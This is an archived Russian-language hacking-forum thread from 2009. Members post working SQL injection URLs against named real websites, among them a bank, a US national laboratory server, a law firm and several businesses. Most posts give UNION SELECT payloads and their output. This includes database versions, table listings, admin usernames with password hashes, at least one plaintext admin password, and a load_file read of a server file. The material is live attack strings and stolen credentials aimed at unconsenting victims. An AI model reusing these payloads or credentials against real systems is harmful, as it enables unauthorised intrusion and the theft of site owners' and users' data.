ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8831  
Старый 12.04.2009, 22:14
Dimionx
Познающий
Регистрация: 28.08.2008
Сообщений: 39
Провел на форуме:
243087

Репутация: 12
Отправить сообщение для Dimionx с помощью ICQ
По умолчанию

www.domesticsupplies.co.uk

Код:
http://www.domesticsupplies.co.uk/product.php?id=-17+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5
Версия - 5.0.45
Юзер - verbiercms@server213-171-218-146.livedns.org.uk
БД - verbierholidays

Код:
http://www.domesticsupplies.co.uk/product.php?id=-17+union+select+concat_ws(0x3a,username,password),2,3,4,5+from+vme_cms_users
Код:
admin:528d29f4efd0516f1bf06f2082725af4
 
Ответить с цитированием

  #8832  
Старый 12.04.2009, 22:28
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.jordan-altmark.de/themen.sed.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7/*

Database Version: 4.1.22-max-log
Database name: d003b735
User name: d003b735@localhost
 
Ответить с цитированием

  #8833  
Старый 12.04.2009, 23:16
Dimionx
Познающий
Регистрация: 28.08.2008
Сообщений: 39
Провел на форуме:
243087

Репутация: 12
Отправить сообщение для Dimionx с помощью ICQ
По умолчанию

www.camdennational.com

Код:
http://www.camdennational.com/personal/savings/product.php?ID=17+union+select+1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9,10,11
Версия - 5.0.45
Юзер - pemaquid_nystr0m@localhost
БД - pemaquid_3lmstr33t

ЮЗЕРЫ

Код:
http://www.camdennational.com/personal/savings/product.php?ID=17+union+select+1,2,concat_ws(0x3a3a,user,pass),4,5,6,7,8,9,10,11+from+tbl_people
P.S. переберием юзеров через лимит

www.uniontrust.com

Основан на той же базе (таблички все те же)

www.unp-russia.ru

Код:
http://www.unp-russia.ru/product.php?id=-17+union+select+1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12
Версия - 4.1.22-log
Юзер - unprussi@fe20.hc.ru
БД - unprussia

ЮЗЕРЫ

Код:
http://www.unp-russia.ru/product.php?id=-17+union+select+1,concat_ws(0x3a3a,login,password),3,4,5,6,7,8,9,10,11,12+from+users+limit+0,1
Перебираем юзеров через лимит
 
Ответить с цитированием

  #8834  
Старый 13.04.2009, 01:31
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

goon.ru - Pr-4 ТиЦ 2100
PHP код:
http://goon.ru/o/msg_view.htm?m_id=-1+union+select+1,2,3,4,5,concat_ws(user(),version(),database()),7,8,9--+ 
goon_top@localhost:5.0.51a-community-log:goon_top
 
Ответить с цитированием

  #8835  
Старый 13.04.2009, 09:43
edichka
Новичок
Регистрация: 31.01.2009
Сообщений: 22
Провел на форуме:
451572

Репутация: 34
По умолчанию

vimss.lbl.gov pr 6

Код:
http://vimss.lbl.gov/findings/selected_image.php?id=-9%20union%20select%201,concat_ws(0x23,user(),database(),version()),3,4,5,6,7,8,9

test@localhost#vimss_WebContent#5.0.22

http://vimss.lbl.gov/admin - basic
Код:
Структура 

17 :In database afcs_WebContent found table events
   0 :   id
   1 :   description
   2 :   startDate
   3 :   endDate
   4 :   startTime
   5 :   endTime
   6 :   event
   7 :   projects
   8 :   link
   9 :   archive
18 :In database afcs_WebContent found table presentations
   0 :   id
   1 :   title
   2 :   abstract
   3 :   presenter
   4 :   fundingSource
   5 :   venue
   6 :   date
   7 :   location
   8 :   link
   9 :   fileName
   10 :   passwordProtected
   11 :   topics
   12 :   lbnlNumber
   13 :   authors
   14 :   archive
19 :In database afcs_WebContent found table projects
   0 :   id
   1 :   project
   2 :   abbreviation
20 :In database afcs_WebContent found table publications
   0 :   id
   1 :   title
   2 :   abstract
   3 :   authors
   4 :   publishedYear
   5 :   publishedBy
   6 :   publishedPages
   7 :   publishedVolume
   8 :   publishedIssue
   9 :   link
   10 :   category
   11 :   topics
   12 :   status
   13 :   editor
   14 :   lbnlNumber
   15 :   fundingSource
   16 :   archive
21 :In database afcs_WebContent found table topics
   0 :   id
   1 :   topic
   2 :   date_added
22 :In database vimss_WebContent found table Images
   0 :   id
   1 :   title
   2 :   description
   3 :   authors
   4 :   fundingSource
   5 :   fileName
   6 :   passwordProtected
   7 :   topics
   8 :   archive
23 :In database vimss_WebContent found table events
   0 :   id
   1 :   description
   2 :   startDate
   3 :   endDate
   4 :   startTime
   5 :   endTime
   6 :   event
   7 :   projects
   8 :   link
   9 :   archive
24 :In database vimss_WebContent found table presentations
   0 :   id
   1 :   title
   2 :   abstract
   3 :   presenter
   4 :   fundingSource
   5 :   venue
   6 :   date
   7 :   location
   8 :   link
   9 :   fileName
   10 :   passwordProtected
   11 :   topics
   12 :   lbnlNumber
   13 :   authors
   14 :   archive
25 :In database vimss_WebContent found table projects
   0 :   id
   1 :   project
   2 :   abbreviation
26 :In database vimss_WebContent found table publications
   0 :   id
   1 :   title
   2 :   abstract
   3 :   authors
   4 :   publishedYear
   5 :   publishedBy
   6 :   publishedPages
   7 :   publishedVolume
   8 :   publishedIssue
   9 :   link
   10 :   category
   11 :   topics
   12 :   status
   13 :   editor
   14 :   lbnlNumber
   15 :   fundingSource
   16 :   archive
27 :In database vimss_WebContent found table topics
   0 :   id
   1 :   topic
   2 :   date_added
 
Ответить с цитированием

  #8836  
Старый 13.04.2009, 14:51
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Юридическая фирма Консвел

Код:
http://www.conswel.ru/index.php?issue_id=66+and+ascii(substring((select+login+from+users+limit+1),1,1))%3E1
 
Ответить с цитированием

  #8837  
Старый 13.04.2009, 15:05
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.symbianware.com/product.php?id=lneditor60&pl=-n6680'+union+select+1,2,concat_ws(0x3a3a,version() ,database()),4,5,6+/*+
4.1.20::symbi001

http://www.teamantigua.com/anuncio.php?cat=Apartments%20For%20Rent&nsc=$.%203 50-850&id=-93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,TABLE_N AME,14,15+from+information_schema.tables--

http://www.video-2-cul.com/video-in.php?id=34848'+union+select+1,load_file('/var/www/vhosts/video-2-cul.com/httpdocs/bas.php'),3,4,5,6,7,8,9,10,11,12,13,14,15+from+mys ql.user/*
админку не нашёл((
 
Ответить с цитированием

  #8838  
Старый 13.04.2009, 17:23
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

<<Kingspan>>
Код:
http://www.kingspan.ua/first.php?idsub=4&idsub1=210&idsub2=217&page=9999999999999+union+select+1,table_name,3+from+information_schema.tables--+
db:5.0.22-Debian_0ubuntu6.06.11-log
name_db: kingspanin
os: KINGSPAN - pc-linux-gnu
Код:
http://www.kingspan.ua/admin/
table: users
-=admins=-
login: admin
pass:maxmax504
+limit+x,x--+

Последний раз редактировалось farex; 13.04.2009 в 17:24.. Причина: Забыл тег закрыть :)
 
Ответить с цитированием

  #8839  
Старый 13.04.2009, 18:06
Tyc00n
Познающий
Регистрация: 13.01.2007
Сообщений: 96
Провел на форуме:
575156

Репутация: 50
По умолчанию

[PR = 6] [SQL - 5]
Код:
http://www.itcdc.com/about.php?p=2+union+select+1,2,3,4/*
+from users

paivi:310b12fd78e579f77f570c334797fc46:Paivi:Salon enaivi@esitemarketing.com:
310b12fd78e579f77f570c334797fc46:sucesso2006

[PR = 6] [SQL - 5]
Код:
http://www.ceskazbrojovka.com/index.php?idp=1&ids=3&lang=en&p=32+union+select+1--+
+from admins

emil:ae80d870eb40a8fd7c256c0ec3faf2ba511ba134:
rsvenda:d271892c3c27f69ce39784a06f95c7f30e667ece:

Последний раз редактировалось jokester; 13.04.2009 в 21:21..
 
Ответить с цитированием

  #8840  
Старый 13.04.2009, 18:10
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

<<Рестораны Одессы "Волдай">>

Код:
http://www.valdai.com.ua/index.php?action=1&id=-4+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6--+
db: 4.0.27-standard
db_name: valdai_valdai
user: valdai_valdai@localhost
os: pc-linux-gnu

Цитата:
Tyc00n
PS: На сервере SAFE_MODE_ON + OPEN_BASE_DIRE_ON, Так что нечего там ловить
Ты не открыл для мну Америку.....
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ